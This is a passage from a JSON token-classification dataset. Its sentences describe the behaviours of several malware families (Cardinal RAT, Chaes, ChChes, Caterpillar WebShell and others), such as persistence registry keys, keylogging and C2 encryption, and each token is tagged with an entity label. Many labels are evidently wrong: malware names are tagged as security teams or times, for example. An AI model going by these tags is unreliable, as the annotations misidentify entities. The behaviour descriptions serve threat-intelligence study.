"B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "uninstall", - "itself,", - "including", - "deleting", - "its", - "executable." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "checks", - "its", - "current", - "working", - "directory", - "upon", - "execution", - "and", - "also", - "contains", - "watchdog", - "functionality", - "that", - "ensures", - "its", - "executable", - "is", - "located", - "in", - "the", - "correct", - "path", - "(else", - "it", - "will", - "rewrite", - "the", - "payload)." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "log", - "keystrokes." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "lures", - "victims", - "into", - "executing", - "malicious", - "macros", - "embedded", - "within", - "Microsoft", - "Excel", - "documents." - ], - "ner_tags": [ - "I-HackOrg", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "sets", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\Load</code>", - "to", - "point", - "to", - "its", - "executable." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "contains", - "watchdog", - "functionality", - "that", - "ensures", - "its", - "process", - "is", - "always", - "running,", - "else", - "spawns", - "a", - "new", - "instance." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "injects", - "into", - "a", - "newly", - "spawned", - "process", - "created", - "from", - "a", - "native", - "Windows", - "executable." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "act", - "as", - "a", - "reverse", - "proxy." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "contains", - "watchdog", - "functionality", - "that", - "periodically", - "ensures", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\Load</code>", - "is", - "set", - "to", - "point", - "to", - "its", - "executable." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "establishes", - "Persistence", - "by", - "setting", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\Load</code>", - "Registry", - "key", - "to", - "point", - "to", - "its", - "executable." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "uses", - "a", - "secret", - "key", - "with", - "a", - "series", - "of", - "XOR", - "and", - "addition", - "operations", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "collect", - "the", - "hostname,", - "Microsoft", - "Windows", - "version,", - "and", - "processor", - "architecture", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "collect", - "the", - "username", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "is", - "downloaded", - "using", - "HTTP", - "over", - "port", - "443." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "execute", - "commands." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "obtains", - "application", - "windows", - "titles", - "and", - "then", - "determines", - "which", - "windows", - "to", - "perform", - "Screen", - "Capture", - "on." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "steals", - "data", - "stored", - "in", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "collects", - "keystrokes", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "stores", - "the", - "gathered", - "data", - "from", - "the", - "machine", - "in", - ".db", - "files", - "and", - ".bmp", - "files", - "under", - "four", - "separate", - "locations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "adds", - "a", - "new", - "service", - "named", - "NetAdapter", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "service." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "creates", - "three", - "Registry", - "keys", - "to", - "establish", - "persistence", - "by", - "adding", - "a", - "Windows", - "Service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "captures", - "screenshots", - "based", - "on", - "specific", - "keywords", - "in", - "the", - "window’s", - "title." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "gathers", - "the", - "Mac", - "address,", - "IP", - "address,", - "and", - "the", - "network", - "adapter", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Catchamas", - "adds", - "a", - "new", - "service", - "named", - "NetAdapter", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "perform", - "brute", - "force", - "attacks", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "collect", - "information", - "from", - "the", - "local", - "database." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "upload", - "files", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "search", - "for", - "files", - "in", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "download", - "and", - "upload", - "files", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "obtain", - "a", - "list", - "of", - "local", - "groups", - "of", - "users", - "from", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "command", - "to", - "modify", - "a", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "use", - "a", - "port", - "scanner", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "gather", - "a", - "list", - "of", - "processes", - "running", - "on", - "the", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "use", - "a", - "rootkit", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "has", - "a", - "module", - "to", - "gather", - "information", - "from", - "the", - "compromrised", - "asset,", - "including", - "the", - "computer", - "version,", - "computer", - "name,", - "IIS", - "version,", - "and", - "more." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "gather", - "the", - "IP", - "address", - "from", - "the", - "victim's", - "machine", - "using", - "the", - "IP", - "config", - "command." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "obtain", - "a", - "list", - "of", - "user", - "accounts", - "from", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "obtain", - "a", - "list", - "of", - "the", - "services", - "from", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Caterpillar", - "WebShell", - "can", - "run", - "commands", - "on", - "the", - "compromised", - "asset", - "with", - "CMD", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "samples", - "were", - "digitally", - "signed", - "with", - "a", - "certificate", - "originally", - "used", - "by", - "Hacking", - "Team", - "that", - "was", - "later", - "leaked", - "and", - "subsequently", - "revoked." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "steals", - "credentials", - "stored", - "inside", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Way", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "can", - "alter", - "the", - "victim's", - "proxy", - "configuration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "collects", - "the", - "victim's", - "%TEMP%", - "directory", - "path", - "and", - "version", - "of", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "is", - "capable", - "of", - "downloading", - "files,", - "including", - "additional", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "copies", - "itself", - "to", - "an", - ".exe", - "file", - "with", - "a", - "filename", - "that", - "is", - "likely", - "intended", - "to", - "imitate", - "Norton", - "Antivirus", - "but", - "has", - "several", - "letters", - "reversed", - "(e.g.", - "notron.exe)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ChChes", - "collects", - "its", - "process", - "identifier", - "(PID)", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "establishes", - "persistence", - "by", - "adding", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "can", - "encode", - "C2", - "data", - "with", - "a", - "custom", - "technique", - "that", - "utilizes", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ChChes", - "can", - "encrypt", - "C2", - "traffic", - "with", - "AES", - "or", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "collects", - "the", - "victim", - "hostname,", - "window", - "resolution,", - "and", - "Microsoft", - "Windows", - "version." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ChChes", - "communicates", - "to", - "its", - "C2", - "server", - "over", - "HTTP", - "and", - "embeds", - "data", - "within", - "the", - "Cookie", - "HTTP", - "header." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "the", - "Puppeteer", - "module", - "to", - "hook", - "and", - "monitor", - "the", - "Chrome", - "web", - "browser", - "to", - "collect", - "user", - "information", - "from", - "infected", - "hosts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "can", - "steal", - "login", - "credentials", - "and", - "stored", - "financial", - "information", - "from", - "the", - "browser." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "decrypted", - "an", - "AES", - "encrypted", - "binary", - "file", - "to", - "trigger", - "the", - "download", - "of", - "other", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "encryption", - "for", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "exfiltrated", - "its", - "collected", - "data", - "from", - "the", - "infected", - "machine", - "to", - "the", - "C2,", - "sometimes", - "using", - "the", - "MIME", - "protocol." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Some", - "versions", - "of", - "Chaes", - "stored", - "its", - "instructions", - "(otherwise", - "in", - "a", - "`instructions.ini`", - "file)", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "can", - "download", - "additional", - "files", - "onto", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "a", - "module", - "to", - "perform", - "any", - "API", - "hooking", - "it", - "desires." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "Installutill", - "to", - "download", - "content." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "JavaScript", - "and", - "Node.Js", - "information", - "stealer", - "script", - "that", - "exfiltrates", - "data", - "using", - "the", - "node", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "requires", - "the", - "user", - "to", - "click", - "on", - "the", - "malicious", - "Word", - "document", - "to", - "execute", - "the", - "next", - "part", - "of", - "the", - "attack." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "an", - "unsigned,", - "crafted", - "DLL", - "module", - "named", - "<code>hha.dll</code>", - "that", - "was", - "designed", - "to", - "look", - "like", - "a", - "legitimate", - "32-bit", - "Windows", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Chaes", - "can", - "modify", - "Registry", - "values", - "to", - "stored", - "information", - "and", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - ".MSI", - "files", - "as", - "an", - "initial", - "way", - "to", - "start", - "the", - "infection", - "chain." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "used", - "the", - "<code>CreateFileW()</code>", - "API", - "function", - "with", - "read", - "permissions", - "to", - "access", - "downloaded", - "payloads." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "Python", - "scripts", - "for", - "execution", - "and", - "the", - "installation", - "of", - "additional", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "added", - "persistence", - "via", - "the", - "Registry", - "key", - "<code>software\\microsoft\\windows\\currentversion\\run\\microsoft", - "windows", - "html", - "help</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "can", - "capture", - "screenshots", - "of", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "been", - "delivered", - "by", - "sending", - "victims", - "a", - "phishing", - "email", - "containing", - "a", - "malicious", - ".docx", - "file." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "Base64", - "to", - "encode", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "a", - "script", - "that", - "extracts", - "the", - "web", - "session", - "cookie", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "collected", - "system", - "information,", - "including", - "the", - "machine", - "name", - "and", - "OS", - "version." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "collected", - "the", - "username", - "and", - "UID", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "changed", - "the", - "template", - "target", - "of", - "the", - "settings.xml", - "file", - "embedded", - "in", - "the", - "Word", - "document", - "and", - "populated", - "that", - "field", - "with", - "the", - "downloaded", - "URL", - "of", - "the", - "next", - "payload." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "VBscript", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaes", - "has", - "used", - "cmd", - "to", - "execute", - "tasks", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaos", - "conducts", - "brute", - "force", - "attacks", - "against", - "SSH", - "services", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "After", - "initial", - "compromise,", - "Chaos", - "will", - "download", - "a", - "second", - "stage", - "to", - "establish", - "a", - "more", - "permanent", - "presence", - "on", - "the", - "affected", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaos", - "provides", - "a", - "reverse", - "shell", - "connection", - "on", - "8338/TCP,", - "encrypted", - "via", - "AES." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chaos", - "provides", - "a", - "reverse", - "shell", - "is", - "triggered", - "upon", - "receipt", - "of", - "a", - "packet", - "with", - "a", - "special", - "string,", - "sent", - "to", - "any", - "port." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chaos", - "provides", - "a", - "reverse", - "shell", - "connection", - "on", - "8338/TCP,", - "encrypted", - "via", - "AES." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "collect", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "retrieve", - "C2", - "domain", - "information", - "from", - "actor-controlled", - "S3", - "buckets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "decrypt", - "downloaded", - "modules", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "exfiltrate", - "gathered", - "data", - "to", - "a", - "hardcoded", - "C2", - "URL", - "via", - "HTTP", - "POST." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "send", - "victim", - "data", - "via", - "FTP", - "with", - "credentials", - "hardcoded", - "in", - "the", - "script." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "change", - "its", - "C2", - "channel", - "once", - "every", - "360", - "loops", - "by", - "retrieving", - "a", - "new", - "domain", - "from", - "the", - "actors’", - "S3", - "bucket." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "delete", - "created", - "files", - "from", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "enumerate", - "drives", - "and", - "list", - "the", - "contents", - "of", - "the", - "C:", - "drive", - "on", - "a", - "victim's", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "has", - "the", - "ability", - "to", - "download", - "additional", - "modules", - "to", - "a", - "compromised", - "host." 